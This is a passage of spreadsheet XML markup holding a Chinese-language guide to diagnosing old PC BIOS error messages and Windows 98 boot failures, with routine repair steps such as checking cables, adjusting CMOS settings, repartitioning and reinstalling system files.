      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>HDD</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）控制卡及电缆。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　（六）、提示“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">8042 Gate A20 Error </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>8042</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>芯片坏；提示“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DMA Error</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> DMA </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制器坏。这种故障需要更换。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　（七）、提示“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Display Switch Not Proper</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　主板上的显示模式跳线设置错误，重新跳线。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　（八）、提示“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Keyboard is Lock...Unlock it</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　键盘被锁住，打开锁后重新引导系统。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　（九）、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口设备检测信息为：“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Detecting Primary </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（或</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Secondary</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Master</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（或</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Slave</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>... None</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　表示该</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口都没有找到硬盘，如果该</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>口确实接有硬盘的话，则说明硬盘没接上或硬盘有故障，可以从以下几方面检查：　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、硬盘电源线和数据线是否接触不良，或换一根线试试；</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设置有无错误，进入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>将“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Primary Master</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”、“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Primary Slave</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”、“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Secondary Master</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”三项的的“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>TYPE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”都设置成“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Auto</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”；</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、替换法确认硬盘本身有故障。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　（十）、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口设备检测信息下面显示“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Floppy disk(s) fail(40)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”出错信息</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　表示</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>所指定的软盘驱动器有问题。判断和解决的方法与硬盘相似。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　现象五：系统不能引导。这种故障一般都不是严重问题，只是系统在找到的用于引导的驱动器中找不到引导文件，比如：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的引导驱动器设置中将软驱排在了硬盘驱动的前面，而软驱中又放有没有引导系统的软盘或者</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的引导驱动器设置中将光驱排在了硬盘驱动的前面，而光驱中又放有没有引导系统的光盘，这个都很简单，将光盘或软盘取出就可以了，实际应用中遇到“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Disk Boot Failure</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Insert System Disk And Press Enter</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”的提示，多数都是这个原因。如果是硬盘不能引导的话一般有两种情况：一种是硬盘数据线没有插好，另一种就是硬盘数据损坏。前者一般多会出现硬盘容量检测不正确和引导时出现死机的现象；后者则是干脆找不到引导文件或提示文件损坏。前者只需重新连接好数据线即可；后者则需要用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>win98</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的启动软盘或启动光盘启动，根据实际情况来定：</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>一</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、提示“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Invalid partition table</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”或“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Not Found any [active partition] in HDD Disk Boot Failure</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Insert System Disk And Press Enter</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，这说明找不到硬盘活动分区，需要对硬盘重新分区。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>二</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、提示“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Miss operation syste</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”，说明硬盘活动分区需要重新格式化（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>format c:/s</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）。　</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、提示“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Invalid system disk Replace the disk</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> and then press any key</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”或显示“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Starting Windows 98 </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>…”时出现死机，说明硬盘上的系统文件丢失了或损坏，使用“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>sys c:</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”，命令传递系统文件给</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>c</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘，再将</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Command.com</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拷贝给</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>c</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>一</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、直接将接口卡与各个外设都拨去，再插回去，并调整接口卡上的设置（如果可以的话）来检查是否是硬件冲突造成，开机看看是否可正常进入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    (</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>二</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中的设置是否</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>有不正确的地方，若不清楚，可选择</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Load Bios Default</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>项目，然后重开机，开机看是否可正常进入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、在启动时按下</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>F8</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>键，一般会出现</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>6</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个选项（如果安装了</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DOS6.22</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>则出现</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>7</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个选项）选择第</t>
    </r>
    <r>
